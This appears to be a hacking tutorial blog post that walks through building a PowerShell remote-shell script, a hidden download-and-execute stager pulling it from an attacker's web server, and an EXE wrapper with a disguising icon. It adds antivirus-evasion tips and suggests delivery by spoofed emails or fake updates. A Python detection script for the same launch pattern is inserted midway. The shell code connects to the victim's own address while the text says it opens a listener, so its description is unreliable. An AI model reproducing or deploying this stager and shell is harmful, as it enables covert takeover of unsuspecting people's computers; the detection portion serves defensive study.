The provided information is only for educational use.

Today we're gonna do some sniki biki style hacking with PowerShell.

I assume you have Kali Linux installed and running.
First we need to install Wine so we can execute EXE files. Run:
sudo apt install wine64

Once installed, download PS2EXE; you can get it here: https://gallery.technet.microsoft.com/scriptcenter/PS2EXE-GUI-Convert-e7cb69d5/file/172772/12/PS2EXE-GUI.zip
In this post we're going to use a PowerShell script provided by staaldraad.

Let's start by creating our PowerShell script/payload.
First of all we need to get the computer's IP address. We will do it with a one-liner:
$IPV4=(Test-Connection -ComputerName $env:computername -count 1).ipv4address.IPAddressToString

Running this gives you the IP address of the current computer, so if a victim runs it, we get their IP address.
Once we have the address we can use the script provided by staaldraad. The whole script looks like this:

## Getting the IPv4 address of the machine the script runs on
$IPV4=(Test-Connection -ComputerName $env:computername -count 1).ipv4address.IPAddressToString
## Opening the TCP connection to $IPV4 on port 8080
## (note: TcpClient initiates an outbound connection to that address; it does not open a listening socket itself)
$socket = new-object System.Net.Sockets.TcpClient($IPV4, 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
    ## Print a prompt and wait for a line from the other side
    $writer.Write("> ");
    $writer.Flush();
    $read = $null;
    while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        ## First word is the command, the rest are its arguments; output is sent back over the socket
        $out = $out.split(' ')
        $res = [string](&$out[0] $out[1..$out.length]);
        if($res -ne $null){ $writer.WriteLine($res)}
    }
}While (!$out.equals("exit"))
$writer.close();$socket.close();

Let's call the script ps_8080.ps1
PS: You can use an online virus scan tool like https://metadefender.opswat.com/ to see whether it passes or gets detected by AV. In our example only ESET detected it as a trojan. Also please don't upload it to VirusTotal!
Now we need our victim to download the script. So my thought was an additional script again.
I would recommend running an HTTP server like Apache or nginx, where you can easily store the file. Or you can use port forwarding on your router and run the server on your machine, but I won't describe how to do that in this post. Alternatively you can upload it to the cloud and share the file with someone.

Let's assume we have an HTTP server on the internet. The script would look like this:

$url = "http://YOURIPADDRESS/ps_8080.ps1"
## PowerShell does not expand %TMP%; use the environment variable directly
$output = "$env:TEMP\ps_8080.ps1"
Invoke-WebRequest -Uri $url -OutFile $output
powershell -noprofile -windowstyle hidden -noninteractive -executionpolicy Bypass -noExit -command $output

I'll call the script download+execute.ps1
So now we have a download-and-execute script. Next I would like to convert it to an EXE. For that we're going to use the PS2EXE we downloaded earlier. We can even choose an icon to look less suspicious. Also let's suppress the output and error output; just tick the two checkboxes.

All is set up; just press compile now.
Once the EXE has been downloaded and executed, there will be an open listener on port 8080.
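From the defender's side, the launch line in download+execute.ps1 is the thing to key on: a hidden window, an execution-policy bypass, no profile, a script dropped in the user's temp directory, and a parent process that is a freshly downloaded EXE. The following Python is an added example, not code from the post or from staaldraad; it scores constructed process-creation events (the log format and field names are assumed) against exactly those indicators.

```python
import re

# Indicators taken from the post's own download+execute one-liner. Each flag has
# legitimate uses on its own; the combination is what makes an event worth a look.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass":   re.compile(r"-(ep|ex\w*)\s+bypass", re.I),   # -ep / -ex / -executionpolicy
    "no_profile":      re.compile(r"-nop(rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(nteractive)?\b", re.I),
    "script_in_temp":  re.compile(r"\\temp\\[^\s\"']+\.ps1", re.I),
}
# Assumed log layout: space-separated key=value pairs, values with spaces in double quotes.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

def parse_event(line):
    """Parse one process-creation log line into a dict of fields."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
            for m in FIELD_RE.finditer(line)}

def assess(event):
    """Return (verdict, matched indicator names) for one parsed event."""
    cmd = event.get("CommandLine", "")
    if "powershell" not in event.get("Image", "").lower() and "powershell" not in cmd.lower():
        return "ignore", []
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    # A parent outside the usual system locations (e.g. an EXE in Downloads) adds weight.
    parent = event.get("ParentImage", "").lower()
    if parent and not parent.startswith(("c:\\windows\\", "c:\\program files")):
        hits.append("unusual_parent")
    if ("hidden_window" in hits and "policy_bypass" in hits) or len(hits) >= 3:
        return "alert", hits
    return ("review" if len(hits) >= 2 else "ok"), hits

def scan(lines):
    """Assess every line; returns [(line_no, verdict, hits), ...]."""
    return [(i, *assess(parse_event(line))) for i, line in enumerate(lines, 1)]

SAMPLE_EVENTS = [  # constructed events for demonstration, not real telemetry
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'ParentImage=C:\Users\bob\Downloads\update.exe '
    r'CommandLine="powershell -noprofile -windowstyle hidden -noninteractive '
    r'-executionpolicy Bypass -noExit -command C:\Users\bob\AppData\Local\Temp\ps_8080.ps1"',
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'ParentImage=C:\Windows\System32\svchost.exe '
    r'CommandLine="powershell.exe -NoProfile -File C:\Scripts\nightly_backup.ps1"',
    r'Image=C:\Windows\System32\cmd.exe ParentImage=C:\Windows\explorer.exe CommandLine="cmd.exe /c dir"',
]

if __name__ == "__main__":
    for line_no, verdict, hits in scan(SAMPLE_EVENTS):
        print(f"event {line_no}: {verdict:7} {', '.join(hits)}")
```

The same indicators translate directly into a Sysmon Event ID 1 or EDR rule on CommandLine and ParentImage; the bind-shell script itself additionally shows up as powershell.exe owning a TCP socket on port 8080.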

To connect, you can use Metasploit or netcat to talk to the listener. I will not show how that works in this post, but in a later one.
There are different ways you can deploy the script/EXE: spoofed emails, hijacked downloads, hijacked browsers pretending to offer an update, and many more.
